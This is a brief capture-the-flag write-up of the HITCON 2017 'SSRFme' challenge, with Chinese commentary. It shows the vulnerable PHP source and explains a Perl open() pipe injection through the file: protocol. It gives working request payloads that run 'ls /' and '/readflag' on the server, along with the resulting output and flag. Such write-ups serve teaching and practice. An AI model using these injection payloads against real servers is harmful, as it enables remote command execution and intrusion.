[HITCON 2017]SSRFme.md


<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);
?>

参考 大佬的wp

GETperl的一个命令,对于file协议的处理调用了open函数来实现,而open函数支持管道形式的文件句柄,因此可以将命令的结果作为文件处理。

由于GET处理file协议时在调用open前进行了一次文件存在的判断,因此需要访问两次,第一次利用file_put_contents创建文件,第二次进行命令执行

/?url=file:ls /|&filename=ls /|
/?url=file:ls /|&filename=ls /|
/sandbox/xxxx/ls /|
bin
boot
dev
etc
flag
home
lib
lib64
media
mnt
opt
proc
readflag
root
run
sbin
srv
start.sh
sys
tmp
usr
var

有个readflag,直接执行

/?url=file:bash -c /readflag|&filename=bash -c /readflag|
/sandbox/xxxx/bash -c /readflag|
flag is flag{1a5541cb-126c-4986-be35-c82a6c98bb6f}

#Web #RCE #perl #file #protocol #open #function